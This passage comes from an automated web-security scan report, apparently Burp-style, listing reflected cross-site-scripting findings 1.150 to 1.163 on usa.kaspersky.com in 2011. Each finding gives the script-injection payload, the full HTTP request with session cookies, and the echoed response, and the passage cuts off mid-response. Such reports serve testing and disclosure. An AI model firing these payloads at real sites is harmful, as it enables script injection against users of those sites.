X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
}
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/resources/knowledge-center/whitepaperse91be"-alert(1)-"12aebe11698";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.150. http://usa.kaspersky.com/resources/knowledge-center/whitepapers [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/resources/knowledge-center/whitepapers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e3d7"><script>alert(1)</script>93ae9a92e57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/knowledge-center/whitepapers?4e3d7"><script>alert(1)</script>93ae9a92e57=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139084465-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fresources%25252Fknowledge-center%25252Fwhitepapers%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:05:40 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141540"
Content-Type: text/html; charset=utf-8
Content-Length: 54350
Date: Sun, 04 Sep 2011 13:06:00 GMT
X-Varnish: 1163120944
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/resources/knowledge-center/whitepapers?4e3d7"><script>alert(1)</script>93ae9a92e57=1" />
...[SNIP]...

1.151. http://usa.kaspersky.com/search/apachesolr_search [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e153"-alert(1)-"fb85deb5a47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search7e153"-alert(1)-"fb85deb5a47/apachesolr_search HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:10 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145290"
Content-Type: text/html; charset=utf-8
Content-Length: 30641
Date: Sun, 04 Sep 2011 14:08:18 GMT
X-Varnish: 1163250280
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/search7e153"-alert(1)-"fb85deb5a47/apachesolr_search";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.152. http://usa.kaspersky.com/search/apachesolr_search [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a126"><script>alert(1)</script>dc901a9507b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search6a126"><script>alert(1)</script>dc901a9507b/apachesolr_search HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:39 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145259"
Content-Type: text/html; charset=utf-8
Content-Length: 30738
Date: Sun, 04 Sep 2011 14:07:49 GMT
X-Varnish: 1163248932
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search6a126"><script>alert(1)</script>dc901a9507b/apachesolr_search" />
...[SNIP]...

1.153. http://usa.kaspersky.com/search/apachesolr_search [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd98d"><script>alert(1)</script>012d6f3a9b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_searchcd98d"><script>alert(1)</script>012d6f3a9b7 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:58 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145338"
Content-Type: text/html; charset=utf-8
Content-Length: 30229
Date: Sun, 04 Sep 2011 14:09:05 GMT
X-Varnish: 1163252488
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_searchcd98d"><script>alert(1)</script>012d6f3a9b7" />
...[SNIP]...

1.154. http://usa.kaspersky.com/search/apachesolr_search [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3361b"><script>alert(1)</script>28ebda2c90f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search?3361b"><script>alert(1)</script>28ebda2c90f=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:11 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145231"
Content-Type: text/html; charset=utf-8
Content-Length: 29658
Date: Sun, 04 Sep 2011 14:07:28 GMT
X-Varnish: 1163247849
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search?3361b"><script>alert(1)</script>28ebda2c90f=1" />
...[SNIP]...

1.155. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/far%20help%20virus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95090"-alert(1)-"6ca4c5faa38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search95090"-alert(1)-"6ca4c5faa38/apachesolr_search/far%20help%20virus HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:55:12 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140912"
Content-Type: text/html; charset=utf-8
Content-Length: 30743
Date: Sun, 04 Sep 2011 12:55:26 GMT
X-Varnish: 1163102337
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/search95090"-alert(1)-"6ca4c5faa38/apachesolr_search/far%20help%20virus";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.156. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/far%20help%20virus

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40f83"><script>alert(1)</script>b60263f7e0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search40f83"><script>alert(1)</script>b60263f7e0f/apachesolr_search/far%20help%20virus HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:54:18 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140858"
Content-Type: text/html; charset=utf-8
Content-Length: 30840
Date: Sun, 04 Sep 2011 12:54:33 GMT
X-Varnish: 1163100813
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search40f83"><script>alert(1)</script>b60263f7e0f/apachesolr_search/far%20help%20virus" />
...[SNIP]...

1.157. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/far%20help%20virus

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efd3"><script>alert(1)</script>72b7766c221 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search6efd3"><script>alert(1)</script>72b7766c221/far%20help%20virus HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:59:16 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141156"
Content-Type: text/html; charset=utf-8
Content-Length: 30297
Date: Sun, 04 Sep 2011 12:59:38 GMT
X-Varnish: 1163109913
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search6efd3"><script>alert(1)</script>72b7766c221/far%20help%20virus" />
...[SNIP]...

1.158. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/far%20help%20virus

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0711"><script>alert(1)</script>9f904e9ecf9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search/far%20help%20virusf0711"><script>alert(1)</script>9f904e9ecf9 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:03:51 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141431"
Content-Type: text/html; charset=utf-8
Content-Length: 31106
Date: Sun, 04 Sep 2011 13:03:56 GMT
X-Varnish: 1163117700
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virusf0711"><script>alert(1)</script>9f904e9ecf9" />
...[SNIP]...

1.159. http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/far%20help%20virus

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f435"><script>alert(1)</script>c27525afe55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search/far%20help%20virus?9f435"><script>alert(1)</script>c27525afe55=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/search/apachesolr_search/xss
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:50:42 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140642"
Content-Type: text/html; charset=utf-8
Content-Length: 38345
Date: Sun, 04 Sep 2011 12:50:56 GMT
X-Varnish: 1163094829
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/far%20help%20virus?9f435"><script>alert(1)</script>c27525afe55=1" />
...[SNIP]...

1.160. http://usa.kaspersky.com/search/apachesolr_search/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28500"><script>alert(1)</script>1b71febd288 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search28500"><script>alert(1)</script>1b71febd288/apachesolr_search/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:17 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145297"
Content-Type: text/html; charset=utf-8
Content-Length: 32331
Date: Sun, 04 Sep 2011 14:08:25 GMT
X-Varnish: 1163250555
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search28500"><script>alert(1)</script>1b71febd288/apachesolr_search/index.html" />
...[SNIP]...

1.161. http://usa.kaspersky.com/search/apachesolr_search/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ae97"-alert(1)-"6f128e7c3a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search6ae97"-alert(1)-"6f128e7c3a8/apachesolr_search/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:08:36 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145316"
Content-Type: text/html; charset=utf-8
Content-Length: 30691
Date: Sun, 04 Sep 2011 14:08:44 GMT
X-Varnish: 1163251267
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/search6ae97"-alert(1)-"6f128e7c3a8/apachesolr_search/index.html";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.162. http://usa.kaspersky.com/search/apachesolr_search/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e31"><script>alert(1)</script>dd86b28eecc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_searchc9e31"><script>alert(1)</script>dd86b28eecc/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:09:27 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145367"
Content-Type: text/html; charset=utf-8
Content-Length: 30273
Date: Sun, 04 Sep 2011 14:09:33 GMT
X-Varnish: 1163253438
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_searchc9e31"><script>alert(1)</script>dd86b28eecc/index.html" />
...[SNIP]...

1.163. http://usa.kaspersky.com/search/apachesolr_search/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 646e5"><script>alert(1)</script>ba42b202e41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search/index.html646e5"><script>alert(1)</script>ba42b202e41 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:23 +0000
